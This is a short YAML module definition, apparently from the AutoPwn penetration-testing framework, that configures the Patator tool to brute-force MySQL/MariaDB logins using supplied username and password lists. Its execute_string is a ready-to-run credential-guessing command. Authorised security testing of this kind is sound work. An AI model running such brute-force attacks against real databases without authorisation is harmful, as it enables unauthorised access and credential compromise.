name: patator_mysql
dependencies: ['patator']
url: https://github.com/lanjelot/patator/
description: Patator brute force tool - MySQL/MariaDB module
autopwn_version: 0.25.1
assessment_groups: ['brute']

options:
    target_name:
        required: True
        example_values: target1
    target:
        type: ip_address
        required: True
        example_values: 127.0.0.1|example.org
    port_number:
        type: port_number
        required: True
        example_values: 3306
        default_value: 3306
    user_file:
        type: file
        required: True
        example_values: ~/users.txt
    password_file:
        type: file
        required: True
        example_values: ~/passwords.txt

execute_string: "patator mysql_login host={target} port={port_number} user=FILE0 0={user_file} password=FILE1 1={password_file} -x ignore:fgrep='Access denied for user' 2> {output_dir}/{date}_{target_name}_patator-mysql"
stdout: False
